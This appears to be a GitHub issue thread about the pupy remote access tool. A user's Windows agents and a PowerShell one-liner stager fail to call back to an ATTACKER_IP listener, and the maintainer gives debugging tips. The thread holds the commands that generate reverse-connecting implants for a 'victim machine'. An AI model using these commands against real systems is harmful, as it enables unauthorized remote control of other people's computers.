pupy
pupy copied to clipboard
n1nj4sec
Agents don't connect back
After installing the containers and running the pupy image I tried to generate a simple agent which was supposed to connect back to the server on port 1234 by using command gen -f client -O windows -A x64 connect --host ATTACKER_IP:1234 -t ec4. There's already a listener exists and is listening on port 1234. However when I run the agent on the victim machine no network traffic is even initiated.
I also tried to generate a ps1_oneliner agent which successfully retrieved the 2nd stage payload from the pupy docker webserver running on port 9000 but the retrieved payload didn't check in to the server.
What could be the problem?
Docker run command: docker run --rm -it -p 1234:1234 -p 9000:9000 docker-pupy python pupysh.py
You can add --debug arg to gen. It should be clear what is going wrong there
The command and the output of it as follows:
>>gen --debug -f client -O windows -A x86 connect --host 172.16.151.236:1234 -t ec4
[+] Generate client: windows/x86
{ Configuration }
KEY VALUE
--------------------------------------------------
launcher connect
launcher_args --host 172.16.151.236:1234 -t ec4
cid 1151546663
debug True
[+] Required credentials (found)
+ SSL_BIND_CERT
+ ECPV_RC4_PRIVATE_KEY
+ ECPV_RC4_PUBLIC_KEY
[+] OUTPUT_PATH: /opt/pupy/pupy/output/pupyx86d.RrTgwS.exe
[+] SCRIPTLETS: []
[+] DEBUG: True
When run on the victim machine, the executable agent crashes and no output is displayed. I'll try to debug the executable to see what went wrong with it. In the mean time I'm sharing the results maybe there's a quick fix or something small that I'm missing.
>>>listen
[+] ec4: 1234
>>>
and output of netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::9000 :::* LISTEN 2899/docker-proxy
tcp6 0 0 :::1234 :::* LISTEN 2926/docker-proxy
tcp6 0 0 :::8443 :::* LISTEN 2912/docker-proxy
Crash is happening in the function sub_40C000 . For some reason the calculated final value of ecx points to some location in .data section which is not marked as executable which causes the program to crash.
Do you know what's the reason behind this?
Do you know what's the reason behind this?
No idea what is this and where it is.
Once you created payload with debug, it creates two logs. At the beginning at execution it starts to output to stdout (but on windows you will not see this, as It runs as an application with window, so you need to redirect stdout to some file). Then it creates low level log at AppData\Local\Temp, and then python payload also creates additional log (python level) at AppData\Local\Temp.
Also you can also compile payload with FEATURE_POSTMORTEM. It will enable SEH handlers and will write both python and low level stacktraces (including libraries loaded from the memory).
No idea what is this and where it is.
It's the disassembly code for the pupy 32bit windows executable agent.
Once you created payload with debug, it creates two logs.
The crash seems to be happening before any of that as I don't see any logs being created in or outside of AppData\Local\Temp.
Also you can also compile payload with FEATURE_POSTMORTEM
Right now I'm using a dockerized pupy and running the command docker run --rm -it docker-pupy sh -c /opt/pupy/client/sources/buildenv.sh is asking me for a [sudo] password for pupy: which I don't have.
This looks like wrong binary templates (very old) used with newer code base. Have you compiled them by yourself or you are using those embedded to docker image from docker hub? If so, can you check that you are not using some really old image?